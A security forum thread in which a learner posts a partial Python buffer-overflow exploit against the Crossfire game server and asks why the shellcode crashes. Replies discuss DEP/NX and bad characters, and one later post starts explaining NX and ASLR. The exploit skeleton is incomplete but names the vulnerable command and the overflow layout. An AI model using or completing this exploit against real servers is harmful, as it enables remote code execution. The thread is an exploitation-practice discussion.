July 2, 2013 at 7:37 pm #8506zaixerParticipant
I am practicing linux bof exploitation. when trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to shellcode, however, when start executing the shell code, the program fails.
OS version (bt5 R3):
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
import socket, sys
host = sys.argv
#0x8134e77 jump eax
#0xb7dadad6 nop sled address
crash = “x90” *199 + shellcode + “x43” * 4090 + “xd6xdaxdaxb7” + “D” * 7
buffer= “x11(setup sound ” + crash + “x90x00#”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print “[*]Sending evil buffer…”
print “[*]Payload Sent !”
I placed a break point before the shellcode and the execution flow hits it successfully, however, after continuing the program crashes and gives the following message:
“Program received signal SIGSEGV, Segmentation fault.
0xb7daeb36 in ?? ()”
when inspecting this address, it’s full of zeros !
I already disabled ASLR before starting the exercise and I am wondering does any other protection mechanism exist that prevents exploitation ?
July 8, 2013 at 7:36 pm #53214dynamikParticipant
DEP? Maybe try an older Distro like Ubuntu 7.04.
Also, have you filtered out bad characters? Does your shellcode arrive completely in tact?
July 8, 2013 at 9:52 pm #53215
July 13, 2013 at 2:51 am #53216zaixerParticipant
I think DEP is windows based and NX is linux based…correct me please if I am wrong. the point is not to make it work only. its about understanding why it did not work :). I do not like leaving it just because it did not work 🙂
July 15, 2013 at 1:45 pm #53217testdotphpParticipant
I think DEP is windows based and NX is linux based…correct me please if I am wrong.
DEP is not Windows only and is even supported by phone OSes like iOS and Android.
Also, the “never execute bit” is part of the CPU and is supported by quite a few operating systems now. The never execute bit was a large part of the MS08-067 “thing”, as well.
July 22, 2016 at 5:48 am #53218Henry864Participant
Is there a way to check which memory protection mechanize is used by the OS?
I have a program that fails with segmentation fault, in one computer (ubuntu) but not in another (RH6).
One of the explanations was memory protection mechanize used by the OS. Is there a way I can find / change it?
July 30, 2016 at 10:42 am #53219Henry864Participant
Until recently the exact model of how ALSR and other memory protection mechanisms work on Linux was something that I knew only at a high level. Recently I’ve done a lot of work where I’ve had the need to bypass these mechanisms (in a cooperative setting), and I want to explain for readers exactly how the memory protection model on x86/Linux systems works, what it protects against, and the ways it can be bypassed.
There are two major mechanisms in place to protect memory access that are turned on by default on most x86-64 Linux systems. The first is the so-called NX bit which is a setting that gives finer-grained permissions to mapped memory regions. The second is address space layout randomization (ALSR) which randomizes where certain parts of a program are loaded into memory. I’ll discuss these two topics separately since they are complementary but completely orthogonal to one another.
You must be logged in to reply to this topic.